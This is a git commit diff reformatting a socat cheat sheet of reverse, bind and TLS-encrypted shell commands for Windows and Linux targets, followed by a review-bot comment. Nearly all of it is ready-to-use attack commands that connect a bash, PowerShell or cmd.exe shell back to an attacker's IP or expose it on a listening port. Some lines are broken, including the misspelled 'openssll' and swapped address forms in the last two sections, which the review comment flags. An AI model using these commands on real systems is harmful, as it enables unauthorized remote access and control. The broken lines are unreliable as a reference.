gurkenhabicht 2026-05-26 22:15:27 +02:00
parent d61022f4b3
commit 71b1322381
1 changed files with 62 additions and 16 deletions


@ -1,54 +1,100 @@
# socat cheat sheet # socat cheat sheet
## Reverse Shell ## Reverse Shell
### reverse shell listener ### reverse shell listener
```socat tcp-l:<port> -```
```socat TCP-L:<PORT> file:`tty`,raw,echo=0``` ```sh
socat tcp-l:<port> -
```
```sh
socat TCP-L:<PORT> file:`tty`,raw,echo=0
```
### windows target ### windows target
```sh ```sh
socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:powershell.exe,pipes socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:powershell.exe,pipes
``` ```
### linux target ### linux target
```sh ```sh
socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:"bash -li",pty,stderr,sigint,setsid,sane socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:"bash -li",pty,stderr,sigint,setsid,sane
``` ```
## Bind Shell ## Bind Shell
### generic connect ### generic connect
```socat TCP:<TARGET-IP>:<TARGET-PORT> -```
```sh
socat TCP:<TARGET-IP>:<TARGET-PORT> -
```
### windows target listener ### windows target listener
```socat TCP-L:<PORT> EXEC:powershell.exe,pipes```
```sh
socat TCP-L:<PORT> EXEC:powershell.exe,pipes
```
### linux target listener ### linux target listener
```socat TCP-L:<PORT> EXEC:"bash -li"
```sh
socat TCP-L:<PORT> EXEC:"bash -li"
```
## Connect from statically compiled socat to LHOST ## Connect from statically compiled socat to LHOST
Binary is inside this dir Binary is inside this dir
```socat TCP:<ATTACKER-IP>:<ATTACKER-PORT> EXEC:"bash -li",pty,stderr,sigint,setsid,sane``` ```sh
socat TCP:<ATTACKER-IP>:<ATTACKER-PORT> EXEC:"bash -li",pty,stderr,sigint,setsid,sane
```
## Encrypted Shell ## Encrypted Shell
### create key + cert ### create key + cert
```openssll req --newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt```
```sh
openssll req --newkey rsa:2048 -nodes -keyout shell.key -x509 -days 365 -out shell.crt
```
### create pem file ### create pem file
```cat shell.key shell.crt > shell.pem```
```sh
cat shell.key shell.crt > shell.pem
```
### reverse shell listener ### reverse shell listener
```socat openssl-listen:<port>,cert=shell.pem,verify=0 -```
```socat openssl-listen:<port>,cert=shell.pem,verify=0 file:`tty`,raw,echo=0``` ```sh
socat openssl-listen:<port>,cert=shell.pem,verify=0 -
```
```sh
socat openssl-listen:<port>,cert=shell.pem,verify=0 file:`tty`,raw,echo=0
```
### connecting shell on target to listener ### connecting shell on target to listener
```socat openssl:<attacker-ip>:<attacker-port>,verify=0 exec:/bin/bash```
```socat openssl:<attacker-ip>:<attacker-port>,verify=0 exec:"bash -li",pty,stderr,sigint,setsid,sane``` ```sh
socat openssl:<attacker-ip>:<attacker-port>,verify=0 exec:/bin/bash
```
```sh
socat openssl:<attacker-ip>:<attacker-port>,verify=0 exec:"bash -li",pty,stderr,sigint,setsid,sane
```
### encrypted bind shell on windows listening ### encrypted bind shell on windows listening
* target
```socat openssl-listen:<local-ip>:<local-port>,verify=0 exec:cmd.exe,pipes``` Target:
```sh
socat openssl-listen:<local-ip>:<local-port>,verify=0 exec:cmd.exe,pipes
```
### encrypted bind shell attacker connecting ### encrypted bind shell attacker connecting
```socat openssl:<port>,cert=shell.pem,verify=0 -```
```sh
socat openssl:<port>,cert=shell.pem,verify=0 -
```
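Review bot: the "create key + cert" block still spells the command `openssll`, so the line fails as written; this change already touches it (`-days 362` becomes `-days 365`), so correct it to `openssl` in the same commit. In the last two sections the address forms look swapped relative to the encrypted reverse-shell section above: there the listener is `openssl-listen:<port>,cert=shell.pem,verify=0` and the client is `openssl:<attacker-ip>:<attacker-port>,verify=0`, whereas here the listener is given `<local-ip>:<local-port>` with no `cert=` and the connecting side gets only `<port>` plus `cert=shell.pem`. Please make these consistent with the forms used earlier in the file. Since every TLS example sets `verify=0`, a one-line note in the "Encrypted Shell" section that the peer certificate is not verified (the channel is encrypted but not authenticated) would help readers. Style: "* target" was turned into a "Target:" label, but the following "attacker connecting" block has no matching label; either label both or drop it.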